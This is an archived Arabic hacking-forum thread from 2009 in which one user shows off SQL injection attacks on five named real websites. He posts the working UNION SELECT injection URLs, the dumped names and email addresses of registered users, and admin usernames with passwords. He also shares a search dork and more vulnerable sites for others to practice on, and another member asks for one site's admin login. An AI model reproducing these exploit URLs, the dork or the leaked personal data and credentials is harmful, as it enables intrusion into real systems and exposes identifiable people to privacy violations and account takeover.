:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   Hackers Showoff (http://www.vbspiders.com/vb/forumdisplay.php?f=91)
-   -   مواقع مصابة مع استغلال بعضها (http://www.vbspiders.com/vb/showthread.php?t=22869)

marrak 12-13-2009 01:18 AM

مواقع مصابة مع استغلال بعضها
 
السلام عليكم
-----------------------------------------------------
اقدم بداية اعتذاري على الموقع الاباحي الدي وضعته في مشاركة سابقة.
-----------------------------------------------------
الموقع الأول
http://www.lucienkrief.co.il
الاستغلال
كود PHP:

http://www.lucienkrief.co.il/showArtist.php?id=-43%20union%20all%20select%20group_concat%28name,0x3a,email%29,2%20from%20register-- 

بعض المعلومات
Rosenbach:urosen10@hotmail.com
dan:dan@atarim.co.il
Gad:gad@atarim.com
Nissim:nissim@lucienkrief.co.il
Brian R. Burr:bb@scanasset.com
atarim:atarim@atarim.com
Lisa Matisoff:lmatisoff@hotmail.com
Yehuda:yshemtov@earthlink.net
Bob Vinitsky:bob_vinitsky@yahoo.com
elsa:edj@zahav.co.il
NEAL J. NISSEL:NEAL@NISSELCPA.COM
Anna Bronshtein:annushka15@hotmail.com
Alex Usatch:ousatch@cms.vinnica.ua
j:j@yahoo.com
Karen Zoller:Kazzzzzzz@msn.com
Harris Bak:harris.bak@milliman.com
jl slotin:jsbroadway@aol.com
Nikki Irving:NikIrving@yahoo.com
deena ganger:deenrsnbrgD@AOL.COM
xuy s bugra:xuy@email.com
Samuel Freed:samuelfreed@aol.com
Hillel Kirschner:hillel@elegantheadwear.com
Rabbi Pinny:RabbiPinny@aol.com
jill naviasky:jill_w@bayardad.com
---------------------------------------------------------
الموقع الثاني
http://www.hispanicprwire.com
الاستغلال
كود PHP:

http://www.hispanicprwire.com/news.php?l=in&id=-2840%20union%20all%20select%201,2,3,group_concat%28Login,0x3a,Password%29,5,6,7,8,9,10%20from%20HPR_Extenal_User-- 

المعلومات
alberto:alberto

marrak 12-13-2009 01:20 AM

الموقع الثالث وهو شبه كامل
كود PHP:

http://www.snseurope.com/snslink/news/news-full.php?id=-13508%20UNION%20SELECT%201,2,group_concat%28password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20eas_database-- 


marrak 12-13-2009 01:30 AM

الموقع الرابع
كود PHP:

http://www.mynhw.co.uk/news-full.php?id=-324%20union%20all%20select%201,2,database%28%29,4,5,6,7,8,9,10,11,12,13-- 

للحصول على معلومات الأدمن
كود PHP:

http://www.mynhw.co.uk/news-full.php?id=-324%20union%20all%20select%201,2,group_concat%28vAdminName,0x3a,vPassword%29,4,5,6,7,8,9,10,11,12,13%20from%20csc_admin-- 


marrak 12-13-2009 01:41 AM

الموقع الخامس
كود PHP:

http://c2-europe.eu/news-full.php?id=-323%20union%20all%20select%201,2,3,group_concat%28username,0x3a,password%29,5,6,7,8,9,10,11,12,13,14%20from%20admin-- 

معلومات الأدمن
michael:5ejufe
franz:ba3uju
nora:v6xup3
seb:t2e5ab
rod:ga3ra4
nadine:6uraha

marrak 12-13-2009 01:52 AM

اخيرا اليكم الدروك الذي استعملته للحصول على بعض هذه المواقع

كود PHP:

inurl:news-full.php?id

وهذه مواقع اخرى مصابة لمن يريد ان يتمرن
كود PHP:

http://www.chrecruitment.co.uk/news.full.php?id=92%27 

كود PHP:

http://www.c2-deutschland.de/news-full.php?id=157%27 

كود PHP:

http://www.novazora.eu/news-full.php?id=21%27&start=0%27 

لكم تحياتي

AkKiRa-HaCkEr 12-13-2009 03:15 AM

ماشاء الله عليك اخي
ممكن تعطيني رابط الدخول الى لوحة التحكم لهذا الموقع ؟؟؟

http://www.mynhw.co.uk/news-full.php...%20csc_admin--

Black-FoG 12-13-2009 06:01 PM

بصراحة اتحييت من اغلاق المواضيع المخالفة هدا قسم الانجازات يا عالم يعني اختراق كامل ...
مش تجيب اعمدة وجداول وباسووردات مشفرة تضع موضوع ...

لو كان الامر هكدا كنت انا اولكم واضع كل يوم 100 موقع ... بس مش هيك

ادا الاختراق كامل يعني مسيطر على الموقع اهلا وسهلا ... اتمنى يكون المسج وصل للجميع بدون استثناء



اسف على هدا الكلام الجاف بس اشوف ان القسم يتدهور وحطيت قانون ومع دلك لا حد راضي يطبقه ..

الامر بيد الادارة


Adiooooos


الساعة الآن 03:18 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0